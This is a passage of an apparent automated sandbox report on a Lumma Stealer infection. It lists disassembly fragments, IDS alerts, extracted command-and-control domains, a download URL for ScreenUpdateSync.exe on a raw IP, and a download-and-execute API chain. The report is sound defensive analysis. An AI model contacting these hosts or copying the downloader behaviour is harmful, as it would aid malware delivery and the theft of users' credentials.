                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then lea eax, dword ptr [esp+18h] | 3_2_024C54D1
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edi+eax] | 3_2_024B554C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h] | 3_2_024B6544
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h | 3_2_024DD557
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx edx, word ptr [eax] | 3_2_024DD557
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_024BC528
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 3_2_024C552B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov word ptr [ebp+00h], 0000h | 3_2_024C559D
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 3_2_024C55B3
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h] | 3_2_024ADA09
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh] | 3_2_024AEAA2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h] | 3_2_024ACB7E
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h | 3_2_024C5BF7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx ecx, di | 3_2_024C5BF7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024AABA7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov edx, ecx | 3_2_024AABA7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 3_2_024CB75E
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024CB75E
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024B4806
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h | 3_2_024C0817
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 3_2_024D3897
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_024CC8B1
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_024CC94B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h] | 3_2_024A9967
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h] | 3_2_024A9967
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h] | 3_2_024A9967
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_024B6907
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov eax, edx | 3_2_024BC921
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h] | 3_2_024C89C0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov edx, dword ptr [ebp-10h] | 3_2_024DA9DE
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch | 3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh | 3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh | 3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h | 3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h | 3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h | 3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh | 3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h | 3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_024CC98D
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_024CC99C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov ebp, dword ptr [eax] | 3_2_024D6E67
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov word ptr [eax], dx | 3_2_024B5F79
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024C1F77
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov word ptr [ebx], dx | 3_2_024B8F35
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov word ptr [ebx], cx | 3_2_024B8F35
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h | 3_2_024DCFC7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+ecx] | 3_2_024ADF8C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movsx eax, byte ptr [esi] | 3_2_024DBC08
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 3_2_024C9C17
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [ecx+edx] | 3_2_024BEC17
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh | 3_2_024D6C3B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov esi, eax | 3_2_024C3C9B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024DAD19
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h | 3_2_024DCD87

                Networking

                barindex
                Source: Network traffic | Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.8:50583 -> 1.1.1.1:53
                Source: Network traffic | Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.8:52321 -> 1.1.1.1:53
                Source: Network traffic | Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.8:49707 -> 172.67.207.38:443
                Source: Network traffic | Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.8:59245 -> 1.1.1.1:53
                Source: Network traffic | Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.8:50741 -> 1.1.1.1:53
                Source: Network traffic | Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.8:51869 -> 1.1.1.1:53
                Source: Network traffic | Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.8:50855 -> 1.1.1.1:53
                Source: Network traffic | Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.8:49708 -> 104.21.16.1:443
                Source: Network traffic | Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.8:56023 -> 1.1.1.1:53
                Source: Network traffic | Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.8:54571 -> 1.1.1.1:53
                Source: Network traffic | Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.8:49571 -> 1.1.1.1:53
                Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49711 -> 23.55.153.106:443
                Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49708 -> 104.21.16.1:443
                Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49708 -> 104.21.16.1:443
                Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49707 -> 172.67.207.38:443
                Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 172.67.207.38:443
                Source: Malware configuration extractor | URLs: awake-weaves.cyou
                Source: Malware configuration extractor | URLs: effecterectz.xyz
                Source: Malware configuration extractor | URLs: sordid-snaked.cyou
                Source: Malware configuration extractor | URLs: deafeninggeh.biz
                Source: Malware configuration extractor | URLs: diffuculttan.xyz
                Source: Malware configuration extractor | URLs: debonairnukk.xyz
                Source: Malware configuration extractor | URLs: wrathful-jammy.cyou
                Source: Malware configuration extractor | URLs: immureprech.biz
                Source: DNS query: effecterectz.xyz
                Source: DNS query: diffuculttan.xyz
                Source: DNS query: debonairnukk.xyz
                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Sun, 15 Dec 2024 08:20:25 GMT | Server: Apache/2.4.41 (Ubuntu) | Last-Modified: Sun, 15 Dec 2024 08:15:01 GMT | ETag: "58600-6294aa91c6503" | Accept-Ranges: bytes | Content-Length: 361984 | Content-Type: application/x-msdos-program
                Source: Joe Sandbox View | IP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox View | IP Address: 104.21.56.70 104.21.56.70
                Source: Joe Sandbox View | IP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 176.113.115.19:80
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.207.38:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.16.1:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 23.55.153.106:443
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49705 -> 104.21.56.70:443
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: immureprech.biz
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: deafeninggeh.biz
                Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
                Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, | 0_2_004029F4
                Source: global traffic | HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1 | User-Agent: ShareScreen | Host: post-to-me.com
                Source: global traffic | HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1 | User-Agent: ShareScreen | Host: 176.113.115.19
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=4670f5074b9bfea360f04536; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35131Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 15 Dec 2024 08:20:37 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global traffic | DNS traffic detected: DNS query: post-to-me.com
                Source: global traffic | DNS traffic detected: DNS query: sordid-snaked.cyou
                Source: global traffic | DNS traffic detected: DNS query: immureprech.biz
                Source: global traffic | DNS traffic detected: DNS query: deafeninggeh.biz
                Source: global traffic | DNS traffic detected: DNS query: effecterectz.xyz
                Source: global traffic | DNS traffic detected: DNS query: diffuculttan.xyz
                Source: global traffic | DNS traffic detected: DNS query: debonairnukk.xyz
                Source: global traffic | DNS traffic detected: DNS query: wrathful-jammy.cyou
                Source: global traffic | DNS traffic detected: DNS query: awake-weaves.cyou
                Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: immureprech.biz
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
                Source: AZCFTWko2q.exe, AZCFTWko2q.exe, 00000000.00000003.3768738842.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, AZCFTWko2q.exe, 00000000.00000002.3895946640.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
                Source: AZCFTWko2q.exe, 00000000.00000003.3768738842.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, AZCFTWko2q.exe, 00000000.00000002.3895946640.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe.-
                Source: AZCFTWko2q.exe, 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
                Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000A76000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeiD
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Amcache.hve.7.dr | String found in binary or memory: http://upx.sf.net
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
